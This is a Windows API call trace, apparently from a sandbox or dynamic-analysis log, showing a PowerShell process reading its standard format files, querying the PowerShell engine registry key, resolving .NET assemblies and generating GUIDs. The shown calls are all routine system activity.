	[0817.542] ReadFile (in: hFile=0x308, lpBuffer=0x339c75a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x339c75a*, lpNumberOfBytesRead=0x1cd358*=0x0, lpOverlapped=0x0) returned 1
	[0817.542] ReadFile (in: hFile=0x308, lpBuffer=0x339d128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x339d128*, lpNumberOfBytesRead=0x1cd358*=0x0, lpOverlapped=0x0) returned 1
	[0817.543] CloseHandle (hObject=0x308) returned 1
	[0817.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0817.543] SetErrorMode (uMode=0x1) returned 0x1
	[0817.543] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd300 | out: lpFileInformation=0x1cd300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0817.543] SetErrorMode (uMode=0x1) returned 0x1
	[0817.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0817.543] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x308) returned 0x0
	[0817.543] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd36c, lpData=0x0, lpcbData=0x1cd368*=0x0 | out: lpType=0x1cd36c*=0x1, lpData=0x0, lpcbData=0x1cd368*=0x56) returned 0x0
	[0817.544] CoTaskMemAlloc (cb=0x5a) returned 0x2d9140
	[0817.544] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd33c, lpData=0x2d9140, lpcbData=0x1cd338*=0x56 | out: lpType=0x1cd33c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd338*=0x56) returned 0x0
	[0817.544] CoTaskMemFree (pv=0x2d9140) 
	[0817.544] RegCloseKey (hKey=0x308) returned 0x0
	[0817.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0817.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0817.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1cc870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0817.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cc870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0817.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1cc870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0818.952] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0818.953] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x7691dd25, Data2=0x3015, Data3=0x416a, Data4=([0]=0x8e, [1]=0x66, [2]=0x45, [3]=0x4f, [4]=0x7e, [5]=0xe, [6]=0xf4, [7]=0x18))) returned 0x0
	[0818.954] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x54c65769, Data2=0x3907, Data3=0x4eb8, Data4=([0]=0x97, [1]=0x86, [2]=0x1a, [3]=0x7b, [4]=0x74, [5]=0xaf, [6]=0x4b, [7]=0xb1))) returned 0x0
	[0818.954] VirtualQuery (in: lpAddress=0x1cc030, lpBuffer=0x1ccef0, dwLength=0x30 | out: lpBuffer=0x1ccef0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0818.955] VirtualQuery (in: lpAddress=0x1cc030, lpBuffer=0x1ccef0, dwLength=0x30 | out: lpBuffer=0x1ccef0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0818.956] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xd4ce8327, Data2=0x9af7, Data3=0x4dba, Data4=([0]=0xb8, [1]=0x82, [2]=0x85, [3]=0x8b, [4]=0x73, [5]=0x81, [6]=0xed, [7]=0x5e))) returned 0x0
	[0818.959] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xb51b43c4, Data2=0xbbf5, Data3=0x4cb0, Data4=([0]=0x98, [1]=0xfb, [2]=0xc9, [3]=0xb9, [4]=0x1e, [5]=0x31, [6]=0xbe, [7]=0x2))) returned 0x0
	[0818.959] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x9610f368, Data2=0x810d, Data3=0x4404, Data4=([0]=0xb7, [1]=0x3e, [2]=0xe1, [3]=0x80, [4]=0x5c, [5]=0xd6, [6]=0x3a, [7]=0x8a))) returned 0x0
	[0818.960] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0818.960] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x9c634e71, Data2=0x7f85, Data3=0x4e9d, Data4=([0]=0xa2, [1]=0x71, [2]=0x80, [3]=0x39, [4]=0x5d, [5]=0x3, [6]=0xf4, [7]=0x91))) returned 0x0
	[0818.961] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xdca58113, Data2=0xac71, Data3=0x407e, Data4=([0]=0x84, [1]=0xfa, [2]=0x7a, [3]=0x3f, [4]=0x3c, [5]=0xc7, [6]=0xc9, [7]=0x5d))) returned 0x0
	[0818.961] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0818.961] GetFileType (hFile=0x308) returned 0x1
	[0818.961] SetErrorMode (uMode=0x1) returned 0x1
	[0818.961] GetFileType (hFile=0x308) returned 0x1
	[0818.961] ReadFile (in: hFile=0x308, lpBuffer=0x344f720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x344f720*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.962] ReadFile (in: hFile=0x308, lpBuffer=0x344f720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x344f720*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.962] ReadFile (in: hFile=0x308, lpBuffer=0x344f720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x344f720*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.963] ReadFile (in: hFile=0x308, lpBuffer=0x344f720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x344f720*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.963] ReadFile (in: hFile=0x308, lpBuffer=0x344f720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x344f720*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.963] ReadFile (in: hFile=0x308, lpBuffer=0x344f720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x344f720*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.963] ReadFile (in: hFile=0x308, lpBuffer=0x344f720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x344f720*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.963] ReadFile (in: hFile=0x308, lpBuffer=0x344f720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x344f720*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.967] ReadFile (in: hFile=0x308, lpBuffer=0x344f720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x344f720*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.967] ReadFile (in: hFile=0x308, lpBuffer=0x344f720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x344f720*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.967] ReadFile (in: hFile=0x308, lpBuffer=0x344f720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x344f720*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.968] ReadFile (in: hFile=0x308, lpBuffer=0x344f720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x344f720*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.968] ReadFile (in: hFile=0x308, lpBuffer=0x344f720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x344f720*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.969] ReadFile (in: hFile=0x308, lpBuffer=0x344f720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x344f720*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.969] ReadFile (in: hFile=0x308, lpBuffer=0x344f720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x344f720*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.969] ReadFile (in: hFile=0x308, lpBuffer=0x344f720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x344f720*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.973] ReadFile (in: hFile=0x308, lpBuffer=0x344f720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x344f720*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.973] ReadFile (in: hFile=0x308, lpBuffer=0x344f720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x344f720*, lpNumberOfBytesRead=0x1cd358*=0xbce, lpOverlapped=0x0) returned 1
	[0818.973] ReadFile (in: hFile=0x308, lpBuffer=0x344ee56, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x344ee56*, lpNumberOfBytesRead=0x1cd358*=0x0, lpOverlapped=0x0) returned 1
	[0818.973] ReadFile (in: hFile=0x308, lpBuffer=0x344f720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x344f720*, lpNumberOfBytesRead=0x1cd358*=0x0, lpOverlapped=0x0) returned 1
	[0818.973] CloseHandle (hObject=0x308) returned 1
	[0818.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0818.974] SetErrorMode (uMode=0x1) returned 0x1
	[0818.974] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd300 | out: lpFileInformation=0x1cd300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0818.974] SetErrorMode (uMode=0x1) returned 0x1
	[0818.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0818.974] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x308) returned 0x0
	[0818.974] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd36c, lpData=0x0, lpcbData=0x1cd368*=0x0 | out: lpType=0x1cd36c*=0x1, lpData=0x0, lpcbData=0x1cd368*=0x56) returned 0x0
	[0818.974] CoTaskMemAlloc (cb=0x5a) returned 0x1b8ef640
	[0818.974] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd33c, lpData=0x1b8ef640, lpcbData=0x1cd338*=0x56 | out: lpType=0x1cd33c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd338*=0x56) returned 0x0
	[0818.974] CoTaskMemFree (pv=0x1b8ef640) 
	[0818.974] RegCloseKey (hKey=0x308) returned 0x0
	[0818.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0818.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0818.976] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x6301fcc2, Data2=0xd645, Data3=0x4e97, Data4=([0]=0x90, [1]=0xd8, [2]=0x33, [3]=0x77, [4]=0x71, [5]=0x1f, [6]=0xe9, [7]=0xe3))) returned 0x0
	[0818.977] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x59d8d8fd, Data2=0x4d34, Data3=0x45dc, Data4=([0]=0x9e, [1]=0xb8, [2]=0xf0, [3]=0xd8, [4]=0xdc, [5]=0xfe, [6]=0x46, [7]=0x28))) returned 0x0
	[0818.977] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xef23e754, Data2=0x21d2, Data3=0x4bd3, Data4=([0]=0x89, [1]=0x72, [2]=0xc9, [3]=0x86, [4]=0x8f, [5]=0xbb, [6]=0x2b, [7]=0x17))) returned 0x0
	[0818.977] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x54920510, Data2=0xe598, Data3=0x4c40, Data4=([0]=0x8a, [1]=0x30, [2]=0xde, [3]=0x21, [4]=0xeb, [5]=0x42, [6]=0x8, [7]=0x0))) returned 0x0
	[0818.977] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x83992b8a, Data2=0xc49a, Data3=0x4e78, Data4=([0]=0x8c, [1]=0x6a, [2]=0x2f, [3]=0xf8, [4]=0xbd, [5]=0xae, [6]=0xd1, [7]=0x84))) returned 0x0
	[0818.977] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xb67dff21, Data2=0x4fb6, Data3=0x4174, Data4=([0]=0x92, [1]=0x33, [2]=0x35, [3]=0x60, [4]=0x5e, [5]=0xc2, [6]=0x56, [7]=0x8))) returned 0x0
	[0818.977] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xdba096a7, Data2=0x3f3c, Data3=0x4feb, Data4=([0]=0xa5, [1]=0x1f, [2]=0x9, [3]=0x0, [4]=0xdc, [5]=0xe6, [6]=0x58, [7]=0x92))) returned 0x0
	[0818.977] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xe7c58e51, Data2=0x33dc, Data3=0x4edf, Data4=([0]=0xb2, [1]=0x7a, [2]=0xea, [3]=0x6f, [4]=0x21, [5]=0x79, [6]=0x8, [7]=0xef))) returned 0x0
	[0818.978] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xfa50a886, Data2=0x12b0, Data3=0x4ea3, Data4=([0]=0xa4, [1]=0x29, [2]=0x18, [3]=0x4, [4]=0x19, [5]=0x87, [6]=0x72, [7]=0x4c))) returned 0x0
	[0818.978] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x9bcae67d, Data2=0xeae3, Data3=0x4ec9, Data4=([0]=0xb8, [1]=0xde, [2]=0x61, [3]=0x21, [4]=0xe8, [5]=0x44, [6]=0x40, [7]=0xd0))) returned 0x0
	[0818.978] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xe1d20689, Data2=0xbcd1, Data3=0x4be3, Data4=([0]=0xbb, [1]=0x3f, [2]=0xa0, [3]=0x71, [4]=0xfd, [5]=0x7a, [6]=0x8, [7]=0x23))) returned 0x0
	[0818.978] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x9f00313e, Data2=0x1004, Data3=0x464a, Data4=([0]=0x92, [1]=0x52, [2]=0xe0, [3]=0xfb, [4]=0x3a, [5]=0x27, [6]=0x9a, [7]=0x6))) returned 0x0
	[0818.978] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xee65a593, Data2=0x76eb, Data3=0x462f, Data4=([0]=0x9d, [1]=0x27, [2]=0x39, [3]=0xcf, [4]=0xcc, [5]=0x2f, [6]=0x53, [7]=0xc))) returned 0x0
	[0818.978] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x71efe9aa, Data2=0xe21b, Data3=0x4177, Data4=([0]=0xa9, [1]=0x75, [2]=0x2f, [3]=0x4, [4]=0xf8, [5]=0xe3, [6]=0x66, [7]=0xbe))) returned 0x0
	[0818.979] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xd6608354, Data2=0x64c6, Data3=0x48f2, Data4=([0]=0x89, [1]=0x99, [2]=0xf2, [3]=0x97, [4]=0xac, [5]=0x72, [6]=0x97, [7]=0xda))) returned 0x0
	[0818.979] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xb7b29ddc, Data2=0x5701, Data3=0x4cff, Data4=([0]=0x81, [1]=0x68, [2]=0x6b, [3]=0x45, [4]=0x22, [5]=0x31, [6]=0x8f, [7]=0xef))) returned 0x0
	[0818.979] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xf5735f63, Data2=0x3aa, Data3=0x4a5f, Data4=([0]=0x90, [1]=0x1a, [2]=0xd7, [3]=0x8f, [4]=0xea, [5]=0x52, [6]=0x99, [7]=0xbf))) returned 0x0
	[0818.979] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xf227ec36, Data2=0x6d40, Data3=0x4110, Data4=([0]=0x94, [1]=0xd2, [2]=0x6f, [3]=0x1a, [4]=0xfb, [5]=0x4, [6]=0x2e, [7]=0xb7))) returned 0x0
	[0818.979] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x517ab701, Data2=0xe125, Data3=0x4689, Data4=([0]=0xa5, [1]=0x69, [2]=0x39, [3]=0x3f, [4]=0x39, [5]=0x9c, [6]=0xb0, [7]=0xcd))) returned 0x0
	[0818.979] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xac5f5def, Data2=0x3464, Data3=0x4f9a, Data4=([0]=0xa2, [1]=0x79, [2]=0xb3, [3]=0xc2, [4]=0x3f, [5]=0xe9, [6]=0x61, [7]=0xe0))) returned 0x0
	[0818.979] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x7a9a2ad, Data2=0x4f47, Data3=0x44b3, Data4=([0]=0xae, [1]=0x5c, [2]=0x66, [3]=0x70, [4]=0x95, [5]=0xc3, [6]=0x59, [7]=0xce))) returned 0x0
	[0818.979] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x91f1056f, Data2=0xc3bc, Data3=0x47e6, Data4=([0]=0x98, [1]=0x57, [2]=0x2f, [3]=0x2c, [4]=0x41, [5]=0xcc, [6]=0x58, [7]=0xd3))) returned 0x0
	[0818.980] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x8fa3be9e, Data2=0xa4e4, Data3=0x4a94, Data4=([0]=0x87, [1]=0x13, [2]=0x63, [3]=0x39, [4]=0xeb, [5]=0x5c, [6]=0x45, [7]=0xc7))) returned 0x0
	[0818.980] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xbcc8400b, Data2=0x2423, Data3=0x46db, Data4=([0]=0x9c, [1]=0x2d, [2]=0xc7, [3]=0x84, [4]=0x8a, [5]=0xd2, [6]=0xb3, [7]=0xa7))) returned 0x0
	[0818.980] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xdbc4f38, Data2=0xb6f4, Data3=0x4f56, Data4=([0]=0xb7, [1]=0xa, [2]=0xd7, [3]=0xf7, [4]=0x5f, [5]=0xb2, [6]=0xe2, [7]=0xea))) returned 0x0
	[0818.980] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x2fce07af, Data2=0x88cf, Data3=0x417e, Data4=([0]=0x99, [1]=0xb2, [2]=0x3b, [3]=0xe9, [4]=0x56, [5]=0xd4, [6]=0xeb, [7]=0x88))) returned 0x0
	[0818.981] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x20ff72e9, Data2=0x4d05, Data3=0x453d, Data4=([0]=0xac, [1]=0x7f, [2]=0xe8, [3]=0xe1, [4]=0x60, [5]=0x3e, [6]=0x1a, [7]=0x12))) returned 0x0
	[0818.981] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xac00b68b, Data2=0xfb4c, Data3=0x462f, Data4=([0]=0xbf, [1]=0x74, [2]=0xc4, [3]=0x93, [4]=0xed, [5]=0x68, [6]=0xe2, [7]=0xb8))) returned 0x0
	[0818.982] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xc6a6749e, Data2=0xcbd5, Data3=0x4edc, Data4=([0]=0xa2, [1]=0x22, [2]=0x73, [3]=0x5a, [4]=0xb7, [5]=0xa1, [6]=0xc1, [7]=0xa8))) returned 0x0
	[0818.982] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x8d3546e6, Data2=0x8d0e, Data3=0x476c, Data4=([0]=0xb5, [1]=0xac, [2]=0x76, [3]=0x1b, [4]=0x10, [5]=0xfc, [6]=0x3, [7]=0xef))) returned 0x0
	[0818.982] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x289c3cb9, Data2=0x6d2, Data3=0x40c3, Data4=([0]=0xa0, [1]=0x86, [2]=0xc2, [3]=0xad, [4]=0x2a, [5]=0x23, [6]=0xea, [7]=0x26))) returned 0x0
	[0818.982] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x4823cf6e, Data2=0x9072, Data3=0x4890, Data4=([0]=0x89, [1]=0x8c, [2]=0xa5, [3]=0x43, [4]=0xba, [5]=0x31, [6]=0x47, [7]=0xd4))) returned 0x0
	[0818.982] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x22f06a30, Data2=0x7930, Data3=0x4afe, Data4=([0]=0xa8, [1]=0x84, [2]=0xfa, [3]=0x11, [4]=0x80, [5]=0x13, [6]=0x98, [7]=0x96))) returned 0x0
	[0818.983] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xd1c042cf, Data2=0x788f, Data3=0x4d62, Data4=([0]=0xb2, [1]=0xd6, [2]=0xe5, [3]=0x56, [4]=0xd3, [5]=0xc2, [6]=0x96, [7]=0x55))) returned 0x0
	[0818.983] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xe558deff, Data2=0x722d, Data3=0x4ca7, Data4=([0]=0xaa, [1]=0x37, [2]=0x1e, [3]=0xa9, [4]=0x5b, [5]=0xf, [6]=0x46, [7]=0x45))) returned 0x0
	[0818.983] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x833c6c24, Data2=0x88f7, Data3=0x4648, Data4=([0]=0xab, [1]=0x71, [2]=0x66, [3]=0xb0, [4]=0x2b, [5]=0x19, [6]=0xfa, [7]=0x2d))) returned 0x0
